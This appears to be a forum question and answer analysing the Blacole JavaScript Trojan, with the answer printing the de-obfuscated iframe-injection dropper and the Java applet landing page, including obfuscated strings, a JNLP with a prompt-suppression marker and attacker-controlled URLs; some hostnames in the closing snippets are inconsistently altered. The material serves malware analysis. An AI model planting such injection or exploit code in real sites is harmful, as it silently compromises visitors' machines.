 

Javascript malicious injection / redirection by XML comment tags (JS/Exploit-Blacole.em)

I recently came along a web site which, inside its HTML markup, had a JS Trojan embedded. The McAfee name is JS/Exploit-Blacole.em, the F-Secure name is Trojan:JS/Agent, and the MS name is Trojan:JS/Quidvetis.A.

Now, out of curiosity, I took a look at the source code of the Trojan (just for your reference, I posted a copy on pastebin; see http://pastebin.com/PsLaE4d9).

What made me wonder is the part on the McAfee site (http://home.mcafee.com/virusinfo/virusprofile.aspx?key=1317346#none, click on the "Virus Characteristics" tab) stating

Also this detection uses the following recent injection techniques in order to make a connection to randomly generated malicious domain. <!--81a338--><!--/81a338-->

The Trojan itself seems to inject an iframe tag in the markup and load some malicious page.

Anyways, my question is, what part do those XML comment tags play? There sure must be a reason why they are mentioned in the McAfee article? Also, is it possible to somehow de-obfuscate the JS code and transform it to something human readable? Again, this is just out of curiosity. I just want to know what's happening here.

lightxx Avatar asked Sep 11 '13 07:09



1 Answer

Take a look here:

http://wepawet.iseclab.org/view.php?hash=86b656e6ad9d7331acc01a80bf89c6b5&type=js

http://jsunpack.jeek.org/?report=87803db7e6a4d9d0b6190cd5054beda64e3784dd

http://urlquery.net/index.php

These tools will help you analyze the code.

This is the complete retrieved and de-obfuscated code:

// Sample 1 (de-obfuscated dropper): injects an iframe pointing at the exploit
// landing page and moves it out of view. Analyst annotations only; the sample
// body itself is left unchanged.
function r09(){
  // Decoy locals: neither 'static' nor 'controller' is read anywhere.
  // ('static' is only legal as an identifier in sloppy mode.)
  var static = 'ajax';
  var controller = 'index.php';
  var r = document.createElement('iframe');
  // Landing page URL as found in the sample (historical, long since dead).
  r.src = 'http://ecurie80.hostzi.com/Felenne12/clik.php';
  r.style.position = 'absolute';
  // '6675' is not a valid colour; the same number reused in every property
  // looks like a per-sample generated value rather than a meaningful size.
  r.style.color = '6675';
  r.style.height = '6675px';
  r.style.width = '6675px';
  // Unit-less offsets; where the browser honours them the frame ends up far
  // off-screen, which is what hides it from the visitor.
  r.style.left = '10006675';
  r.style.top = '10006675';
  // Guard against double injection. The <p id='r' class='r09'> wrapper is the
  // sample's own marker and is also a usable indicator when scanning markup.
  if (!document.getElementById('r')){
    document.write('<p id=\'r\' class=\'r09\' ></p>');
    document.getElementById('r').appendChild(r);
  }
}
// Generic cookie helper carried by the sample; used below to throttle the
// injection to once per day.
//   cookieName, cookieValue: key and value (the value is escape()-encoded)
//   nDays: lifetime in days; null or 0 (loose compare, so '0' too) become 1
//   path: optional cookie path, appended only when truthy
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  // 3600000 ms * 24 = one day. nDays arrives as the string '1' from the
  // caller; the multiplication coerces it to a number.
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  // One statement split after the dot (legal, if unusual): expire.toGMTString().
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.
  toGMTString() + ((path) ? "; path=" + path : "");
}
// Returns the unescape()d value of cookie `name`, or null when it is absent.
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  // Index just past "name=", i.e. the first character of the value.
  var len = start + name.length + 1;
  // Effectively dead: !start is only true when start === 0, and then the
  // prefix necessarily equals `name`, so the branch never returns.
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  // Cookie not present.
  if (start ==  - 1)return null;
  // Value runs to the next ';' or to the end of the cookie string.
  var end = document.cookie.indexOf(";", len);
  if (end ==  - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}
// Entry point: run the dropper at most once per day per browser. A missing or
// expired 'visited_uq' cookie triggers injection ('55' == 55 is a loose
// compare). Note for analysts: with cookies disabled nothing runs at all, so a
// sandbox configured that way never reaches r09().
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
    // Already marked today: deliberately empty branch.
  }
  else {
    SetCookie('visited_uq', '55', '1', '/');
    r09();
  }
}

This code creates an iframe and pushes it out of view. (The `<!--81a338-->…<!--/81a338-->` comment pair quoted from McAfee is most likely just the marker the injector wraps around its inserted script so it can recognise, and avoid repeating, its own injection; the comment tags themselves execute nothing, but they are a handy string to search for when checking a site's pages for the same infection.)

The code runs only once per day per visitor, which it enforces with a cookie.

http://jsunpack.jeek.org/ is also a great tool, used by many security researchers (Brian Krebs among them, I believe).

The iframe loads a page that serves a Java exploit and tries to run it:

 // Sample 2 (landing page): assembles an <applet> tag from obfuscated string
 // constants and writes it into the document. Analyst annotations only; the
 // sample body itself is left unchanged.
 var FPLYKJoQG = {
 // Thin document.write wrapper.
 WdBxtaXWsGnJRm: function (PseXOSDnXPAXRRnkHZs) {
     var FIZdpsWVSgyPuFKU = document;
     FIZdpsWVSgyPuFKU.write(PseXOSDnXPAXRRnkHZs);
 },
  // Strips the '355' filler that obfuscates the string constants below.
  wWgsxtVAofesbJwDAY: function (xPTKZBm) {
     return xPTKZBm.replace(/355/g, '')
 }
 }; 
// -> 'Java'
var SuOmy = FPLYKJoQG.wWgsxtVAofesbJwDAY('355Ja355355355355va355355355355355355355355'); 
// `z` is not defined in this excerpt; presumably a plugin-detection helper
// that returns a Java version string which is then split on ',' — TODO confirm
// against the full landing page.
var CHHBPE = z.vvv( SuOmy  ).split(','); 
// -> 'jnlp'
var BZTlEHUaD = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355j355355355n355355355355355355355355355355355355355355l355p355355355355355355355355355'); 
// -> 'applet'
var ZNZXaZkfijhQTihemz = FPLYKJoQG.wWgsxtVAofesbJwDAY('355355355355355355355ap355355355355355355355355pl355355355355355355355355355355e355355355355355355t'); 
// Version gate: looks like "major == 7 and update > 9" (Java 7u10 or later)
// — verify once the shape of z.vvv()'s output is known.
if (CHHBPE[1] == 7 && CHHBPE[3] > 9) { 
 // JNLP branch: jnlp_href plus a base64 jnlp_embedded. Some letters of the
 // base64 and of the param name are HTML-entity encoded (&#120; = 'x',
 // &#100; = 'd') so the literal strings never appear in the script — an
 // evasion worth remembering when writing signatures. Decoding the base64
 // yields a JNLP whose applet-desc carries __applet_ssv_validated=true, a
 // known marker for suppressing the Java security prompt, and a jar resource
 // of /gossip_usually.jar.
 FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + ' height="10" width="10"><param name="' + BZTlEHUaD + '_href" value="d5xs6x0pt9tk85s.jnlp" /><param name="' + BZTlEHUaD + '_embedded" value="PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz4NCj&#120;qbm&#120;wIGhyZWY9ImQ1eHM2eDBwdDl0azg1cy5qbm&#120;wIiBzcGVjPSI&#120;LjAiIHhtbG5zOmpmeD0iaHR0cDovL2phdmFmeC5jb20iPg0KICA8aW5mb3JtYXRpb24+DQogICAgPHRpdG&#120;lPjN5ZE5NQW1PSmlLYlN&#120;RmJZMEl0THM8L3RpdG&#120;lPg0KICAgID&#120;2ZW5kb3I+VzRBcGFXZng&#120;UWwwMXRMbmR1TWFacVpzVG&#120;ISlBBVHF4anhNTWY&#120;RG41PC92ZW5kb3I+DQogIDwvaW5mb3JtYXRpb24+DQogICA8cmVzb3VyY2VzPg0KICAgICAgICA8ajJzZSBocmVmPSJodHRwOi8vamF2YS5zdW4uY29tL3Byb2R1Y3RzL2F1dG9kbC9qMnNlIiB2ZXJzaW9uPSI&#120;LjcrIiAvPg0KICAgICAgICA8amFyIGhyZWY9Ii9nb3NzaXBfdXN1YW&#120;seS5qYXIiIG1haW49InRydWUiIC8+DQogIDwvcmVzb3VyY2VzPg0KICA8YXBwbGV0LWRlc2MgbWFpbi1jbGFzcz0id2pycWZzdHJ2a3d3dG&#120;nLnFqdXRnbXFodHV5cGZqbG1kc3BkYmouY2&#120;hc3MiIG5hbWU9IjB5dW1wMXB4ejlwb3kwIiBoZWlnaHQ9IjEwIiB3aWR0aD0iMTAiPg0KICAgICA8cGFyYW0gbmFtZT0iX19hcHBsZXRfc3N2X3ZhbGlkYXRlZCIgdmFsdWU9InRydWUiIC8+DQogIDwvYXBwbGV0LWRlc2M+DQo8L2pubHA+" /><param name="&#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>');
} else {
 // Fallback for other Java versions: a plain applet with code/archive
 // attributes loading the same jar; the duFJfXw param is the same C2-style
 // URL handed to the applet in both branches.
 FPLYKJoQG.WdBxtaXWsGnJRm('<' + ZNZXaZkfijhQTihemz + '  height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class" archive="/gossip_usually.jar" width="10"><param name="&#100;uFJfXw" value="http://aussteigende.tommeade.com:1024/sequence-backwards.txt?e=21" /></' + ZNZXaZkfijhQTihemz + '>');
}

It loads d5xs6x0pt9tk85s.jnlp and executes it:

<applet height="10" width="10"><param name="jnlp_href" value="d5xs6x0pt9tk85ss.jnlp"><param name="jnlp_embedded" value="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"><param name="duFJfXw" value="http://aussteigende.tommeade.coms:1024/sequence-backwards.txt?e=21"></applet>

or, if that is not possible, it loads the gossip_usually.jar file and executes wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbj.class:

<applet height="10" code="wjrqfstrvkwwtlg.qjutgmqhtuypfjlmdspdbjs.class" archive="/gossip_usuallys.jar" width="10"><param name="duFJfXw" value="http://aussteigende.tommeades.com:1024/sequence-backwards.txt?e=21"></applet>
Daniel Ruf Avatar answered Oct 23 '22 20:10
